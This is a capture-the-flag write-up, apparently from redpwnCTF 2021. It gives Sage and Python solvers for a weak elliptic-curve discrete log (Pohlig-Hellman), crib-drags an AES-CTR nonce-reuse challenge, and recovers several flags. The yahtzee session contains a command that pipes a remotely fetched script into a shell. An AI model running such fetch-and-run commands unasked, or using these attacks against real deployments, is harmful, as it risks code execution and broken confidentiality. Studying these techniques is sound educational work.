everything appears to be okay

time to go to sleep
close the window
the window is closed
replace the fire alarm
the fire alarm is replaced
brush teeth and go to bed
you sleep very well

it's the next morning
mom doesn't suspect a thing, but asks about some white dots on the bathroom floor
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}
[*] Closed connection to mc.ax port 31796
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}
blecc (crypto)
The numbers are all fairly small here, so factor the order of the curve and solve the discrete logarithm subgroup by subgroup (Pohlig-Hellman: solve the DLP in each prime-power subgroup, then recombine the residues with CRT).
#!/usr/bin/sage
from Crypto.Util.number import *

p = 17459102747413984477
a = 2
b = 3
G = (15579091807671783999, 4313814846862507155)
Q = (8859996588597792495, 2628834476186361781)

F = FiniteField(p)
E = EllipticCurve(F, [a, b])
G = E.point(G)
Q = E.point(Q)

# Pohlig-Hellman: the group order is smooth, so solve the DLP in each
# prime-power subgroup and recombine with CRT
factors, exponents = zip(*factor(E.order()))
primes = [factors[i] ^ exponents[i] for i in range(len(factors))]
dlogs = []
for fac in primes:
    t = int(G.order()) // int(fac)      # integer division: t*G has order fac
    dlog = discrete_log(t*Q, t*G, operation='+')
    dlogs += [dlog]

d = crt(dlogs, primes)
print '[+] d =', d
assert d * G == Q

flag = long_to_bytes(d)
flag = 'flag{%s}' % flag
print '[*]flag =', flag
The output is as follows.
[+] d = 7868191182322623331 [*]flag = flag{m1n1_3cc}
flag{m1n1_3cc}
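The same Pohlig-Hellman reduction the Sage script performs, written out in plain Python as an added example (not from the writeup) so that the steps Sage hides behind discrete_log and crt are visible: project G and Q into each prime-power subgroup, solve a small DLP there with baby-step giant-step, then recombine with CRT. It runs on a constructed toy curve y^2 = x^3 + 2x + 3 over GF(1009) rather than the challenge curve, because the point order is found by brute force here (Sage uses proper point counting for the 64-bit modulus); the modulus, the base point search and the secret d = 321 are all my choices.

```python
from math import isqrt

INF = None  # the point at infinity


def ec_add(P, Q, a, p):
    """Affine addition on y^2 = x^3 + a*x + b over GF(p)."""
    if P is INF:
        return Q
    if Q is INF:
        return P
    x1, y1 = P
    x2, y2 = Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return INF                                          # Q == -P
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p    # tangent slope
    else:
        lam = (y2 - y1) * pow((x2 - x1) % p, -1, p) % p     # chord slope
    x3 = (lam * lam - x1 - x2) % p
    y3 = (lam * (x1 - x3) - y1) % p
    return (x3, y3)


def ec_mul(k, P, a, p):
    """Double-and-add scalar multiplication."""
    R = INF
    while k:
        if k & 1:
            R = ec_add(R, P, a, p)
        P = ec_add(P, P, a, p)
        k >>= 1
    return R


def point_order(P, a, p):
    """Brute-force order of P; only sane for the toy curve."""
    n, R = 1, P
    while R is not INF:
        R = ec_add(R, P, a, p)
        n += 1
    return n


def factor(n):
    """Trial-division factorisation: {prime: exponent}."""
    f, d = {}, 2
    while d * d <= n:
        while n % d == 0:
            f[d] = f.get(d, 0) + 1
            n //= d
        d += 1
    if n > 1:
        f[n] = f.get(n, 0) + 1
    return f


def bsgs(P, Q, m, a, p):
    """Baby-step giant-step: k in [0, m) with k*P == Q, P of order dividing m."""
    s = isqrt(m) + 1
    baby, R = {}, INF
    for j in range(s):                 # baby steps: j*P -> j
        baby.setdefault(R, j)
        R = ec_add(R, P, a, p)
    giant = ec_mul(s, P, a, p)
    neg_giant = INF if giant is INF else (giant[0], (-giant[1]) % p)
    R = Q
    for i in range(s):                 # giant steps: Q - i*s*P
        if R in baby:
            return (i * s + baby[R]) % m
        R = ec_add(R, neg_giant, a, p)
    raise ValueError("Q is not in the subgroup generated by P")


def crt(residues, moduli):
    """Chinese remainder theorem for pairwise coprime moduli."""
    x, M = 0, 1
    for r, m in zip(residues, moduli):
        x += M * (((r - x) * pow(M, -1, m)) % m)
        M *= m
    return x % M


def pohlig_hellman(G, Q, a, p):
    """Solve Q = d*G; returns (d mod n, n) where n is the order of G."""
    n = point_order(G, a, p)
    residues, moduli = [], []
    for q, e in factor(n).items():
        qe = q ** e
        t = n // qe
        # t*G has order q^e and t*Q = d*(t*G): a DLP of size q^e
        residues.append(bsgs(ec_mul(t, G, a, p), ec_mul(t, Q, a, p), qe, a, p))
        moduli.append(qe)
    return crt(residues, moduli) % n, n


def find_point(a, b, p):
    """First affine point on the curve (brute force; toy sizes only)."""
    for x in range(p):
        rhs = (x ** 3 + a * x + b) % p
        for y in range(p):
            if y * y % p == rhs:
                return (x, y)


def demo(d=321, a=2, b=3, p=1009):
    """Build a toy instance with secret d and recover it."""
    G = find_point(a, b, p)
    Q = ec_mul(d, G, a, p)
    k, n = pohlig_hellman(G, Q, a, p)
    return k, n, ec_mul(k, G, a, p) == Q


if __name__ == "__main__":
    k, n, ok = demo()
    print("order of G =", n, " recovered d =", k, " check:", ok)
```

The attack works exactly as well on the challenge curve because the hardness of the DLP is bounded by the largest prime factor of the order of G, not by the size of p; that is the property a real curve (prime order, or cofactor 4 or 8) is chosen to have.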
yahtzee (crypto)
The server logic, in outline:
・true_rng = TrueRNG(2)
・rolls = 2
・Repeat until 'quit':
  ・message = random_message().encode()
    ・Pick one of the 25 lines in quotes at random, split it on spaces into an array, and insert the flag at a random index.
  ・encrypted = encrypt(message, key, true_rng)
    ・nonce = true_rng.next()
      ・TrueRNG.yahtzee(2)
        ・dice = array of two random values from 1 to 6
        ・return the sum of dice
    ・AES-CTR encryption
  ・Print the ciphertext
The nonce is the sum of two dice, so it takes only 11 values (2 through 12), and with a fixed key the same CTR keystream will be reused after a handful of samples. First, just look at the output.
$ nc mc.ax 31076
proof of work:
curl -sSfL https://pwn.red/pow | sh -s s.AAATiA==.z34uX6azbkYSA7Lxu93WPw==
solution: s.P908u4Z4PUcNfpELBVV51t3d2C19aIBqkSTEZ7nzpOGkUHOo2IgPxBa5YwiX/0wzOd5dm3/iACvJEpuOGdm5Fis7YHtDXZAOamUUxSzicaQAQ/owWvI60YAYv7q434ULEfrv/hhAaVZgfTeZtfIj75f6A2ScwsbniMaN6dO2RxaOSbdWR6g19uJEqQWx7lPNCFqL/f4cAi22xTSFa3bfEA==
============================================================================
= Welcome to the yahtzee message encryption service.                       =
= We use top-of-the-line TRUE random number generators... dice in a cup!   =
============================================================================
Would you like some samples? y
Ciphertext: 2c19383b50c4b6f73821318124a186a352d713f0432dccd6305367892a1d2495c61edbe1015ab4fee8f7bc34ab59b3abad8c59c5a3a7ae16a43f7c2b8d7acf5a3eb804936d507aed55142cb5259dab8f83124641f32c4dbca21daecc20a0e94ec9ce9980073ad53e3c
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712f206ae5d8f60ce46e51c0ed4d37954c0a647391b28e43185e8312420910ff15a79b4a2f0d111b7babc56d46d01a2c9d70bd7daf8c8c26c251c19d0325c86ec735a39b2819cc832
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 10f31e469309e0aa0c6768e852ebacb028d4fe71aa636e015d3117da86d6f5dde013d3327519b43a1ea81f81ea80800772c63e81314447e531d818de4ce8902f77047c0244b18fa2480794c0e6d74d3297c9b4e19c2e2160bfd114a24c7e657abac2e96d56a5e242135e52ff18b2632b59ad02e9
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 4fd2dfe89dc578470c8bed4059342f068405ce54719e6f1152ea1615ecb598b59bce9b13b231c6c51ec63337b3b12df13421ca0fcff1697944fbf91c39766c440f0b0c11ae9f9c01173d161c6649f5fa9fe10893274bd7a4f984adae98c0835133
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 8ec3ff77926c5e462412e17d4b342dba922f03e456b4a6abe96bdd6b824e343a1530224f69705abc80af990adda56b95a767d5f1a14392a59e105e0a3010f4795f596a2166e1a0242e35a071f2452a95da08dee32976d73751daea2d9d3466b1967bbbae522329c834
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 91135aa897cc7cf173e770d926f6cc00c95840aee34aa4ecf0dc2fd5fefbe641774ded4e5f69201dc68314579a03b380e86a2404f08c6ad03573c1f0cce76350b27d3e29a51ecbe37d9f6d63750947b90bc000c42270861980dcfc0ce782a8ce093a656a87b899584e1b1d6c
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 800d5afa8cdd67ec3df439cd2ca3ce0ac94e40aeea45b4e58fff6981ef84e548611fec0d207e0a23879e4044cd1ce4dd9c673741f1c97ede356384f689fd6450a97a7338ed1298ac6f9b69762e4a468239d45ed65d628b1d80c1
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 4297d8ecd3c26356428fbe430b342d53811d8f5c6c8e6a3725b84b00d4bac0b8b6aadc7da821ed9e15c072749ca61f8e773acc0d90f275240debb01a326621440f0b1006a282d5012e721e1f3208baeccdef008a645e94a3f6c1b6b2d5c1884674a7b36d3a6881
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 2c1e323b50caabfa382a3ec737bbc5b74cc613ea443082d77c5b73d26e1d1ee2964accd7065bbee2fbf08c7a8565f4e9f98a01d0faa8eb09b9697c36ca37c55d29f419c17c5479ff161f3daf6ac8be86c2025851fa017fa8ff0087d126a2bb12cfe3d7a93d68c93960c01af99c
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 8387826491977894a631ffc36ceceeeec47b3d1413b2eec57122b48bdfbc1e89505278536a206704ea830cf6b58c15b8ed8f6e7d162a535f1387ba3672383fd60d798218cf30d6bd6fcc2bc616243861b7adbb14ea6f86d582807e0a50505e92977e6f
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: a8218c72990c679179fdffdd06f220d75f1b95be324363c5d71e926a7ac77d8260934a4b7bbbada3f22031a71201770cbfde374d343ee8435be5f606a7d6a2ac7f098e84ccb900ac8b9631138636db48f0ff4bce8f4d5f3e569d2f985b76fefe8ec454dc82c3fe99f3937b309a68bb75
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 9b8ce0328d7e5f51240aef321e2161ba873113e26697b2fcf155ce78d754581e7e6f194f2e764bbc83acbf19b2943d8db667c5ecb95ad7e996465a0d2444fa674859603675e5bf777a25ac77f710389e830bd3aa2663927958c4b2
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5ce50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 2a133a7e50c7bdfc383a3fc025f2c8ad549254fb582d85de3b12779a7b015bbb9d5a8fc9145ca5acb2f7c3298b6be5b1b0930cc6fabbae0da2277120983cd5436ceb1493675a72be1a1069b02889bf91930d7c36a66f5cc3ba1cbdd77db4964ff3e38a881629973d6b8d4aec9456181d
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 68b61df4fed11c522b7abf14f5541c6af3ab5efa3b51dba1cae8317e0ed78e2f4ebcb21ef8cce4853db51f3674afacfd084c92731e3d78ce919c483be73bc01d472a3cccd867a148cea9242077712d317be9282fe13519888b336b35dd
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 3d00326944d1b0e7762977d83ea7d0a700d45fff4b22dcd8036534c36e2a0faa975d9ccd2a5c9ed3e8ea9728d476f9b8f99b1fd0a8faf91ba33d7021ca33d30f23f64095605437f1011e2ca4649bb18ec6454c07b2384dfdbc5a
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 9296d97a5b5eddf0bac5b768c84b2b1d907a825a6b20e5213c206b2fb249b912d347bc10cd6bc45ce95d4fc8d67749c6e544701822e43a90a93536629a25cb1d3ca193e7dc07eba98629db4f7ef087d30b88cef4d6962e2f54
Would you like some more samples, or are you ready to 'quit'? y
Ciphertext: 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84fe50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★
Two of the ciphertexts (marked ★) are closely related: they have the same length, their first 40 bytes differ, and everything after that is byte-for-byte identical. In AES-CTR the keystream depends only on the key and the nonce, and identical ciphertext bytes under the same keystream mean identical plaintext bytes, so the two messages were built from the same quote, the flag was inserted at a different position, and the nonce (dice sum) was the same. (The second sample shares its first 32 bytes with the first ★ ciphertext for the same reason: same nonce, and the flag at the front of a different quote.)
The first 40 bytes must then be one of these two arrangements:
・part of the quote + flag
・flag + part of the quote
Both 40-byte prefixes were XORed with the same keystream, so XORing the two ciphertexts cancels the keystream and leaves m1 XOR m2; from there, guess pieces of plaintext and crib-drag. The two differing segments are:
・9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f ・b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
$ python xorstrings.py 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613
$ python cribdrag.py 274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613
Your message is currently:
0 ________________________________________
Your key is currently:
0 ________________________________________
Please enter your crib: flag{
*** 0: "A per" 1: "*}cn8" 2: "wnh$|" 3: "de"`J" 4: "o/fV " 5: "%kP)" 6: "a]5&" 7: "W3:n" 8: "><rC" 9: "41t_t" 10: ";yYh#" *** 11: "sTn?v" 12: "^c9jV" 13: "i4lJ" 14: ">aL<" 15: "kA " 16: "& a" 17: "+}k" 18: "!{wP" 19: vqL " 20: "||J<p" 21: "vG:l}" *** 22: "M7ja:" 23: "=gg&8" 24: "mj $T" 25: "`-"Hl" 26: "'/NpI" 27: "%CvU" 28: "I{S " 29: "q^5" 30: "T)" 31: "/cl" 32: ""ep9" 33: "(hv%x" 34: "b{#dm" *** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 0
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0 A per___________________________________
Your key is currently:
0 flag{___________________________________
Please enter your crib: flag{
*** 0: "A per" 1: "*}cn8" 2: "wnh$|" 3: "de"`J" 4: "o/fV " 5: "%kP)" 6: "a]5&" 7: "W3:n" 8: "><rC" 9: "41t_t" 10: ";yYh#" *** 11: "sTn?v" 12: "^c9jV" 13: "i4lJ" 14: ">aL<" 15: "kA " 16: "& a" 17: "+}k" 18: "!{wP" 19: vqL " 20: "||J<p" 21: "vG:l}" *** 22: "M7ja:" 23: "=gg&8" 24: "mj $T" 25: "`-"Hl" 26: "'/NpI" 27: "%CvU" 28: "I{S " 29: "q^5" 30: "T)" 31: "/cl" 32: ""ep9" 33: "(hv%x" 34: "b{#dm" *** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 9
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 A per____flag{__________________________
Your key is currently:
0 flag{____41t_t__________________________
Please enter your crib: son
0: "T#"" 1: "?~l)" *** 2: "bmgc" 3: "qf-'" 4: "z,i" 5: "0h_W" 6: "t^r" 7: "B<}" 8: "=35" 9: "!2{" 10: ".zV/" *** 11: "fWax" 12: "K`6-" "3: "|7c 14: "+bCD" 15: "~B g" 16: "^ )N" 17: "(:" 18: "4t0" 19: "u~ " 20: "iE{" 21: "cD5+" 22: "X4e&" 23: "(dha" 24: "xi/c" 25: "u.-" *** 26: "2,A7" 27: "0@y" 28: "\x\_" 29: "d]R" 30: "An" 31: " $" 32: "!j7" 33: "=kyb" 34: "wx,#" 35: "d-m6" *** 36: "1lx3"
Enter the correct position, 'none' for no match, or 'end' to quit: 5
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 A person flag{__________________________
Your key is currently:
0 flag{0h_W41t_t__________________________
Please enter your crib: 0h_W41t_t
0: "$NU=rsn" 1: "|y]^w6E(&" )" "!jV3 3: "2aPF&a" 4: "9+XfCc)JL" 5: "son flag{" 6: "7Y(i$LP," 7: " ! {y" 8: "G:B >,RY" 9: "b5Jo;iyr" 10: "m}gXl<Y;3" 11: "%PP9" 12: gZU31n" 13: "?0RzPvEd" 14: "her3s_nO_" 15: "=E;Z+dt/" 16: " 9.!_" 17: "T/1M$/Tr" 18: "wEGjY5" 19: "^rO|o:r7" 20: "*xt ?75[" 21: " C\2p7pc" 22: "3TQur[HF" 23: "kcYwcm " 24: ";n&F " 25: "6)x# -:" 26: "q+p@Np" 27: "sGHeKC:[c" 28: "m(FpH6" 29: "'Z %z5cw" 30: "-0&6\b" 31: "OS#swIg"
Enter the correct position, 'none' for no match, or 'end' to quit: 14
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 A person flag{0h_W41t_t_________________
Your key is currently:
0 flag{0h_W41t_ther3s_nO__________________
Please enter your crib: her3s_nO
0: "O)c1zi~" 1: "$tp:0X_8" 2: "yg{ptn" 3: "jl14B(<" 3Z""a&u 5: "+bCD!{w" 6: "oTa.JV@" 7: "Y nfga" 8: "7/&KP6B" 9: ":8g |cb" 10: "5pJ<+RC+" 11: "}]}k~r " 12: "Pj*>^;)!" 13: "g=U" 14: "0h_W41t_" 15: "eHtE~d" 16: "E5]iOE" 17: " ")ct5D" 18: "/ h#XeI" 19: "b(Th" 20: "ruYhxY/ " 21: "xN)8u-`" 22: "C>y52AX" 23: "3ntr0py}" 24: "cc3p\H\0" 25: "n$1dm=" 26: ")&]$A " 27: "+Je - K" 28: "Gr@LjX" "=[y"W 30: "Z}wH,L" 31: "<7dmY" 32: "+v$1\x\"
Enter the correct position, 'none' for no match, or 'end' to quit: 23
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 A person flag{0h_W41t_ther3s_nO_________
Your key is currently:
0 flag{0h_W41t_ther3s_nO_3ntr0py}_________
flag{0h_W41t_ther3s_nO_3ntr0py}
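The crib-drag above, reproduced as an added example (not part of the original writeup): it XORs the two 40-byte ciphertext prefixes from the session, slides the crib flag{ across the result, keeps only offsets where the other plaintext comes out as printable ASCII, and, once one plaintext is fully known, recovers the other with a single XOR. The two ciphertext prefixes and the crib offsets are taken from the session; the completed plaintexts used at the end (the quote fragment "A person" before the flag in one message and after it in the other) are my reconstruction, which the test checks against the XOR value printed by xorstrings.py. Which ciphertext carries which plaintext cannot be read off the XOR alone, so the code never labels them.

```python
import string

# The two differing 40-byte prefixes of the ★ ciphertexts (same key, same
# dice-sum nonce, hence the same AES-CTR keystream).
CT_A = bytes.fromhex(
    "9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f")
CT_B = bytes.fromhex(
    "b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c")

PRINTABLE = set(range(0x20, 0x7f))   # printable ASCII, no control characters


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def crib_drag(xored: bytes, crib: bytes) -> dict:
    """Slide `crib` across c1 ^ c2 (which equals m1 ^ m2).

    Wherever the crib really occurs in one plaintext, the XOR yields the
    other plaintext at that offset.  Offsets whose result contains
    non-printable bytes are discarded; what remains is for a human to judge."""
    hits = {}
    for off in range(len(xored) - len(crib) + 1):
        frag = xor_bytes(xored[off:off + len(crib)], crib)
        if all(c in PRINTABLE for c in frag):
            hits[off] = frag.decode("ascii")
    return hits


def recover_other(xored: bytes, known: bytes) -> bytes:
    """Once one plaintext is fully known, the other is one XOR away."""
    return xor_bytes(xored, known)


if __name__ == "__main__":
    x = xor_bytes(CT_A, CT_B)
    print("m1 ^ m2 =", x.hex())
    for off, frag in sorted(crib_drag(x, b"flag{").items()):
        print("%2d: %r" % (off, frag))
    known = b"A person flag{0h_W41t_ther3s_nO_3ntr0py}"
    print("other plaintext:", recover_other(x, known))
```

Offset 0 yields "A per" and offset 9 yields "41t_t", which are the two candidates the session accepted; every other offset is noise that happens to be printable, so the printable filter narrows the list but does not replace reading it.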
quaternion-revenge (crypto)
$ nc mc.ax 31868
n: 109407261225601290979646993307199045582771989091617528040453388668527729655364021294073786236928010288425931170033882500008141737282348381080859938184708804261036670840857901348501188283821065103049160013518150182035783438575945282872216684014487995809554297629331427519782755136732060248945297800684475538669
l: 1024
c1: 8004256688474344817870233833875940222941935887236015063020756596204632736684872367826070568041179498012108632998282142428784927079034900107638096754487286
c2: 4072287980754638763334170410426881140079193675181120657395601634493823175738330991693959371966799518587104964948856594595459994325207179456447135423397260
Calculate the left quaternion isomorphism of m:
>>>
Try something arbitrary.
$ nc mc.ax 31868
n: 86130025636062055956513705083930642167992989060850106586281533247785660295367892438990867856454597008437399796578554368813552223751092749003124747057080792118304583487867234267309926248815120163138042117181301840830034157223307134822520786058567011588349160660968369137756745079514802619272300098374308411299
l: 1023
c1: 9593237318463895403485245835019899101341699250286125466299423268449833221079568272438381700968557138900898253166344975020822465215214852631020599973244033
c2: 4265549705909481277885344297128796851846735962116752700305188804452208934636515673843776196495539597068674270572889618802045156010757400818748543749630735
Calculate the left quaternion isomorphism of m:
>>> i+j
flag{00p5_1_l13d_r0fl}
The flag was displayed. It is also displayed for i*j, but I cannot give a theoretical explanation.
flag{00p5_1_l13d_r0fl}
survey (misc)
After answering the survey, the following URL was displayed.
https://static.redpwn.net/content/survey-i9cbpsiv2d6x3zz9.txt
Opening it showed the flag.
flag{thank5_f0r_play1ng_r3dpwnctf_2021!_zc9e848yg2gdhwxz}